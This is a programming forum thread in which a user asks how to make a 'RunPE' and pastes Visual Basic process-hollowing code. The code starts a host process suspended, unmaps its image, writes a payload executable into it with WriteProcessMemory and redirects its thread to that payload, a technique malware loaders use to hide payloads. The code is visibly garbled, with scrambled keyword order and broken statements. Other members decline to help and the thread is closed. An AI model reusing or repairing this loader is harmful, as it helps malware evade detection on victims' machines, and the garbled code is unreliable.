Results 1 to 4 of 4

Thread: How to make a RunPE

  1. #1

    Thread Starter
    Registered User
    Join Date
    Mar 2013

    How to make a RunPE

    hello i want to know how to make a RunPE in
    Option Explicit
     CONTEXT_FULL As Long Private Const = & H10007
     Private Const MAX_PATH As Integer = 260
     CREATE_SUSPENDED As Long Private Const = & H4
     MEM_COMMIT As Long Private Const = & H1000
     MEM_RESERVE As Long Private Const = & H2000
     PAGE_EXECUTE_READWRITE As Long Private Const = & H40
     Private Declare Function CreateProcessA Lib "Kernel32" (ByVal LpAppName As String, ByVal LpCommandLine As String, ByVal LpProcessAttributes As Long, ByVal LpThreadAttributes As Long, ByVal BInheritHandles As Long, ByVal DwCreationFlags As Long, ByVal LpEnvironment As Long, ByVal LpCurrentDirectory As Long, LpStartupInfo As STARTUPINFO, LpProcessInformation As PROCESS_INFORMATION) As Long
     Private Declare Function WriteProcessMemory Lib "Kernel32" (ByVal HProcess As Long, LpBaseAddress As Any, BvBuff As Any, ByVal NSize As Long, LpNumberOfBytesWritten As Long) As Long
     Private Declare Function OutputDebugString Lib "Kernel32" Alias ​​"OutputDebugString" (ByVal LpOutputString As String) As Long
     Public Declare Sub RtlMoveMemory Lib "Kernel32" (Dest As Any, Src As Any, ByVal L As Long)
     Private Declare Function CallWindowProc Lib "User32" (ByVal Addr As Long, ByVal P1 As Long, ByVal P2 As Long, ByVal P3 As Long, ByVal P4 As Long) As Long
     Private Declare Function GetProcAddress Lib "Kernel32" (ByVal HModule As Long, ByVal LpProcName As String) As Long
     Private Declare Function LoadLibraryA Lib "Kernel32" (ByVal LpLibFileName As String) As Long
     NLength As Long
     As Long LpSecurityDescriptor
     As Long BInheritHandle
     End Type
     Type Private STARTUPINFO
     Cb As Long
     As Long LpReserved
     As Long LpDesktop
     As Long LpTitle
     As Long DwX
     As Long DwY
     As Long DwXSize
     As Long DwYSize
     As Long DwXCountChars
     As Long DwYCountChars
     As Long DwFillAttribute
     DwFlags As Long
     WShowWindow As Integer
     CbReserved2 As Integer
     As Long LpReserved2
     As Long HStdInput
     As Long HStdOutput
     As Long HStdError
     End Type
     HProcess As Long
     HThread As Long
     As Long DwProcessId
     As Long DwThreadId
     End Type
     Type Private FLOATING_SAVE_AREA
     As Long ControlWord
     As Long StatusWord
     As Long TagWord
     As Long ErrorOffset
     As Long ErrorSelector
     As Long DataOffset
     As Long DataSelector
     RegisterArea (1 To 80) As Byte
     As Long Cr0NpxState
     End Type
     Type Private CONTEXT
     As Long ContextFlags
     As Long DR0
     Dr1 As Long
     Dr2 As Long
     As Long Dr3
     As Long DR6
     As Long DR7
     As Long SegGs
     As Long SegFs
     As Long SEGESA
     As Long SegDs
     Edi As Long
     Esi As Long
     As Long Ebx
     As Long Edx
     As Long Ecx
     As Long Eax
     As Long Ebp
     As Long Eip
     As Long SegCs
     As Long EFLAGS
     As Long GMT
     As Long SegSs
     End Type
     Type Private IMAGE_DOS_HEADER
     E_magic As Integer
     E_cblp As Integer
     E_cp As Integer
     E_crlc As Integer
     E_cparhdr As Integer
     E_minalloc As Integer
     E_maxalloc As Integer
     E_ss As Integer
     E_sp As Integer
     E_csum As Integer
     E_ip As Integer
     E_cs As Integer
     E_lfarlc As Integer
     E_ovno As Integer
     E_res (0 To 3) As Integer
     E_oemid As Integer
     E_oeminfo As Integer
     E_res2 (0 To 9) As Integer
     As Long E_lfanew
     Type End
     Type Private IMAGE_FILE_HEADER
     Machine As Integer
     NumberOfSections As Integer
     As Long TimeDateStamp
     As Long PointerToSymbolTable
     As Long NumberOfSymbols
     SizeOfOptionalHeader As Integer
     Características As Integer
     End Type
     As Long VirtualAddress
     Size As Long
     End Type
     Magic As Integer
     MajorLinkerVersion As Byte
     MinorLinkerVersion As Byte
     As Long SizeOfCode
     As Long SizeOfInitializedData
     As Long SizeOfUnitializedData
     As Long AddressOfEntryPoint
     As Long BaseOfCode
     As Long BaseOfData
     'NT Additional Fields.
     ImageBase As Long
     As Long SectionAlignment
     As Long FileAlignment
     MajorOperatingSystemVersion As Integer
     MinorOperatingSystemVersion As Integer
     MajorImageVersion As Integer
     MinorImageVersion As Integer
     MajorSubsystemVersion As Integer
     MinorSubsystemVersion As Integer
     As Long W32VersionValue
     As Long SizeOfImage
     As Long SizeOfHeaders
     CheckSum As Long
     SubSystem As Integer
     DllCharacteristics As Integer
     As Long SizeOfStackReserve
     As Long SizeOfStackCommit
     As Long SizeOfHeapReserve
     As Long SizeOfHeapCommit
     As Long LoaderFlags
     As Long NumberOfRvaAndSizes
     DataDirectory (0 To 15) As IMAGE_DATA_DIRECTORY
     End Type
     Type Private IMAGE_NT_HEADERS
     Signature As Long
     As FileHeader IMAGE_FILE_HEADER
     As OptionalHeader IMAGE_OPTIONAL_HEADER
     End Type
     SecName As String * 8
     As Long VirtualSize
     As Long VirtualAddress
     As Long SizeOfRawData
     As Long PointerToRawData
     As Long PointerToRelocations
     As Long PointerToLinenumbers
     NumberOfRelocations As Integer
     NumberOfLinenumbers As Integer
     As Long Características
     End Type
     CallAPI Private Function (ByVal Slib As String, ByVal Smod As String, ParamArray Params ()) As Long
     As Long Dim LPTR
     Dim BvASM (& HEC00 & - 1) As Byte
     Dim I As Long
     As Long Dim LMOD
     LMOD = GetProcAddress (LoadLibraryA (SLIB), Smod)
     If LMOD = 0 Then Exit Function
     LPTR = VarPtr (BvASM (0))
     ByVal RtlMoveMemory LPTR, & H59595958, & H4: LPTR = LPTR + 4
     ByVal RtlMoveMemory LPTR, & H5059, & H2: LPTR LPTR + 2 =
     For I = UBound (Params) To 0 Step -1
     ByVal RtlMoveMemory LPTR, & H68, & H1: LPTR LPTR + 1 =
     ByVal RtlMoveMemory LPTR, CLng (Params (I)), & H4: LPTR LPTR + 4 =
     ByVal RtlMoveMemory LPTR, & HE8, & H1: LPTR LPTR + 1 =
     ByVal RtlMoveMemory LPTR, LMOD - LPTR - 4, & H4: LPTR LPTR + 4 =
     ByVal RtlMoveMemory LPTR, & HC3, & H1: LPTR LPTR + 1 =
     CallAPI = CallWindowProc (VarPtr (BvASM (0)), 0, 0, 0, 0),
     End Function
     Injec Sub (ByVal SHost As String, ByRef BvBuff () As Byte, Parameter As String)
     Dim I As Long
     Dim As IMAGE_NT_HEADERS Pinho
     Ctx Dim As CONTEXT
     Si.Cb = Len (Si)
     IHDP RtlMoveMemory, BvBuff (0), 64
     RtlMoveMemory Pinho, BvBuff (Pidh.E_lfanew), 248
     CreateProcessA SHost, "" & Parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
     CallAPI "Ntdll", "NtUnmapViewOfSection" Pi.HProcess, Pinh.OptionalHeader.ImageBase
     CallAPI "Kernel32" "VirtualAllocEx" Pi.HProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT MEM_RESERVE Or, PAGE_EXECUTE_READWRITE
     WriteProcessMemory Pi.HProcess, ByVal Pinh.OptionalHeader.ImageBase, BvBuff (0), Pinh.OptionalHeader.SizeOfHeaders, 0
     For I = 0 To Pinh.FileHeader.NumberOfSections - 1
     Pish RtlMoveMemory, BvBuff (Pidh.E_lfanew + 248 + 40 * I), Len (Pish)
     WriteProcessMemory Pi.HProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, BvBuff (Pish.PointerToRawData) Pish.SizeOfRawData, 0
     Next I
     Ctx.ContextFlags = CONTEXT_FULL
     CallAPI "Kernel32", "GetThreadContext" Pi.HThread, VarPtr (Ctx)
     WriteProcessMemory Pi.HProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
     Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
     CallAPI "Kernel32", "SetThreadContext" Pi.HThread, VarPtr (Ctx)
     CallAPI "Kernel32", "ResumeThread" Pi.HThread
     Sub End
     StrToBytArray Public Function (ByVal SSTR As String) As Byte ()
     Dim I As Long
     Dim Buffer () As Byte
     ReDim Buffer (Len (SSTR) - 1)
     For I = 1 To Len (SSTR)
     Buffer (I - 1) = Asc (Mid (SSTR, I, 1))
     Next I
     StrToBytArray = Buffer
     End Function
     ThisExe Public Function () As String
     As Long Dim LRET
     Dim BvBuff (255) As Byte
     CallAPI LRET = ("Kernel32", "GetModuleFileNameA" App.HInstance, VarPtr (BvBuff (0)), 256)
     ThisExe $ = Left (StrConv (BvBuff, VbUnicode) LRET)
     End Function

    I got this code from web , but dont understand a bit , please help

  2. #2
    PowerPoster dunfiddlin's Avatar
    Join Date
    Jun 2012

    Re: How to make a RunPE

    As there does not appear to be any legitimate use for such a program I don't think anyone here will be willing to fall foul of the site's membership terms to help.
    As the 6-dimensional mathematics professor said to the brain surgeon, "It ain't Rocket Science!"

    Reviews: "dunfiddlin likes his DataTables" - jmcilhinney

    Please be aware that whilst I will read private messages (one day!) I am unlikely to reply to anything that does not contain offers of cash, fame or marriage!

  3. #3
    Fanatic Member Arve K.'s Avatar
    Join Date
    Sep 2008
    Kyrksæterøra, Norway
    Arve K.

    Please mark your thread as resolved and add reputation to those who helped you solve your problem
    Disclaimer: I am not a professional programmer

  4. #4
    I'm about to be a PowerPoster! Joacim Andersson's Avatar
    Join Date
    Jan 1999

    Re: How to make a RunPE

    Thread closed.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Click Here to Expand Forum to Full Width